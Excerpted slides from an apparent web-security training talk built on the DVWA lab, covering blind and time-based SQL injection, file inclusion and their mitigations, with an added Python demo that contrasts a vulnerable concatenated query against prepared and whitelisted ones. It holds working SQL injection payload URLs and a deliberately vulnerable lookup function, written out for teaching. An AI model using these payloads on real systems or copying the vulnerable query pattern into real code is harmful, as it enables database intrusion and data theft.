5. Blind SQL Injection
Normal Blind - You get a TRUE/FALSE response based on the outcome of the
SQL query; the difference is a visible change in the page.
Totally Blind - No visible change in the output for a TRUE or FALSE
condition.
6. Normal Blind
Vulnerable URL:
http://site/vulnerabilities/sqli_blind/?id=1
TRUE Response:
http://site/vulnerabilities/sqli_blind/?id=1 AND 1=1
FALSE Response:
http://site/vulnerabilities/sqli_blind/?id=1 AND 1=2
Check Version:
FALSE Response
http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=4
TRUE Response
http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=5
7. Totally Blind
As this type gives no visible TRUE/FALSE response, we need to use
time-based injection: use IF() for the condition and BENCHMARK() for
the time delay.
Check Version:
FALSE Response (no delay)
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD5(CHAR(1))),null),null
TRUE Response (delayed)
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD5(CHAR(1))),null),null
Table name guessing:
http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING((select 1 from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null),null
11. Mitigation/Prevention
Use of Prepared Statements (Parameterized Queries)
Use of Stored Procedures
Escaping all User Supplied Input
Least Privilege
Whitelist Input Validation
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
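Added example (not from the slides or from DVWA): the same id lookup written three ways, using Python with an in-memory SQLite table as a stand-in for the MySQL backend. The vulnerable version answers the "1 AND 1=1" / "1 AND 1=2" payloads from slide 6 differently (that difference is the blind oracle); the prepared statement binds the whole string as one value and the signal disappears; the whitelist check rejects anything that is not a plain number before it reaches the database. Table and row contents are constructed sample data.

```python
import re
import sqlite3

# Constructed sample data standing in for the application's users table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [(1, "admin"), (2, "gordonb")])
    return db

def vulnerable_lookup(db, user_id):
    # String concatenation: the request parameter becomes part of the SQL text.
    sql = f"SELECT first_name FROM users WHERE user_id = {user_id}"
    return db.execute(sql).fetchall()

def safe_lookup(db, user_id):
    # Prepared statement: the parameter is bound as a value, never parsed as SQL.
    sql = "SELECT first_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# Whitelist: the id must be 1 to 9 decimal digits, nothing else.
ID_PATTERN = re.compile(r"^[0-9]{1,9}$")

def validate_id(user_id):
    return ID_PATTERN.match(user_id) is not None

def validated_lookup(db, user_id):
    # Whitelist validation first, then the parameterized query.
    if not validate_id(user_id):
        raise ValueError("id must be numeric")
    return safe_lookup(db, int(user_id))

def true_false_signal(lookup, db):
    # Row counts for the TRUE and FALSE payloads from slide 6. If they differ,
    # the endpoint leaks a boolean oracle; if they are equal, it does not.
    true_rows = lookup(db, "1 AND 1=1")
    false_rows = lookup(db, "1 AND 1=2")
    return len(true_rows), len(false_rows)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", true_false_signal(vulnerable_lookup, db))  # (1, 0)
    print("prepared:  ", true_false_signal(safe_lookup, db))        # (0, 0)
```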
15. Mitigation/Prevention
Escape Before Inserting Untrusted Data into HTML Context
Positive or “whitelist” input validation is also recommended
Use HTTPOnly cookie flag
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
16. File Inclusion
Include PHP Shell (RFI)
Directory Traversal (LFI)
Read Code via PHP Stream Filters (PHP://filter)
Remote Code Execution (LFI to RCE)
Etc.
33. Mitigation/Prevention
Ensure that user input is properly validated
Limit the use of dynamic user input in vulnerable functions
Build a whitelist of acceptable file names and codes using regular
expressions (e.g. alphanumeric only) or arrays.
Do not try to blacklist "evil" PHP code
34. Bug Hunting !!
Code Review
Scan for potentially vulnerable functions
Trace their parameters back to the source
Free Tool !! >> http://sourceforge.net/projects/rips-scanner/